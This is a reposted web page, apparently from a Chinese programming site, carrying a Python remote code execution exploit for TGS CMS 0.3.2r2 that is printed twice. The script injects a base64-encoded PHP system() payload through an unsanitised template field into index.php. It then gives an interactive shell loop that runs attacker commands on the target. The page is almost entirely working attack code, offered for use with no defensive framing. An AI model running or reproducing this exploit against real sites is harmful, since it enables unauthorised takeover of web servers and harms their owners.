您现在的位置是:网站首页> 编程资料编程资料
TGS CMS 0.3.2r2 Remote Code Execution Exploit _Exploit_网络安全_
2023-01-18
726人已围观
简介 TGS CMS 0.3.2r2 Remote Code Execution Exploit _Exploit_网络安全_
# TGS CMS Remote Code Execution Exploit
# by 0in
# from Dark-Coders Group!
# www.dark-coders.pl
# Contact: 0in(dot)email[at]gmail(dot)com
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot
# Let's analyze the vuln:
# We've got the: /cms/admin/admin.template_engine.php
# first line:" # next 2-22 lines - comments
# 23: if ($_GET['option'] == "set_template") {
# 24: $filename = "../index.php";
# 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {
# From 50 line to 88 we have definition of file content
# 50: $content = ' # but...
# he.. don't think xD
# 77:$tgs_template->template_dir = "'.$_POST['template_dir'].'";
# 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'";
# 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";
# 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
# And.. boom!
# 89: if (@fwrite($handle,$content)) {
# Just simply exploit for fun:
import httplib
import urllib
print "TGS CMS Remote Code Execution Exploit"
print "by 0in From Dark-Coders Group"
print "www.dark-coders.pl"
print 'Enter target:'
target=raw_input()
print 'Enter path:'
path=raw_input()
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"
exploit=httplib.HTTPConnection(target ':80')
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}
data=urllib.urlencode({'right_delimiter':inject})
exploit.request("POST",path "/cms/admin/admin.template_engine.php?option=set_template",data,headers)
print exploit.getresponse().read()
while(1):
cmd=raw_input("[shell@" target "]#")
if(cmd=='exit'):
quit()
shell=httplib.HTTPConnection(target ':80')
shell.request("GET",path "/cms/index.php?zuo=" cmd)
print shell.getresponse().read()
# by 0in
# from Dark-Coders Group!
# www.dark-coders.pl
# Contact: 0in(dot)email[at]gmail(dot)com
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot
# Let's analyze the vuln:
# We've got the: /cms/admin/admin.template_engine.php
# first line:" # next 2-22 lines - comments
# 23: if ($_GET['option'] == "set_template") {
# 24: $filename = "../index.php";
# 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {
# From 50 line to 88 we have definition of file content
# 50: $content = ' # but...
# he.. don't think xD
# 77:$tgs_template->template_dir = "'.$_POST['template_dir'].'";
# 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'";
# 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";
# 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
# And.. boom!
# 89: if (@fwrite($handle,$content)) {
# Just simply exploit for fun:
import httplib
import urllib
print "TGS CMS Remote Code Execution Exploit"
print "by 0in From Dark-Coders Group"
print "www.dark-coders.pl"
print 'Enter target:'
target=raw_input()
print 'Enter path:'
path=raw_input()
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"
exploit=httplib.HTTPConnection(target ':80')
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}
data=urllib.urlencode({'right_delimiter':inject})
exploit.request("POST",path "/cms/admin/admin.template_engine.php?option=set_template",data,headers)
print exploit.getresponse().read()
while(1):
cmd=raw_input("[shell@" target "]#")
if(cmd=='exit'):
quit()
shell=httplib.HTTPConnection(target ':80')
shell.request("GET",path "/cms/index.php?zuo=" cmd)
print shell.getresponse().read()
相关内容
- JS异步编程之generator与async/await语法糖详解_javascript技巧_
- Vue 项目中Echarts 5使用方法详解_vue.js_
- React使用refs操作DOM方法详解_React_
- xterm.js在web端实现Terminal示例详解_js其它_
- React条件渲染实例讲解使用_React_
- Xterm.js入门官方文档示例详解_其它_
- Vue中过滤器定义以及使用方法实例_vue.js_
- Echarts折线图如何根据容器宽度自适应展示_javascript技巧_
- React18 useState何时执行更新及微任务理解_React_
- BOM操作querySelector querySeletorAll获取标签对象_javascript技巧_
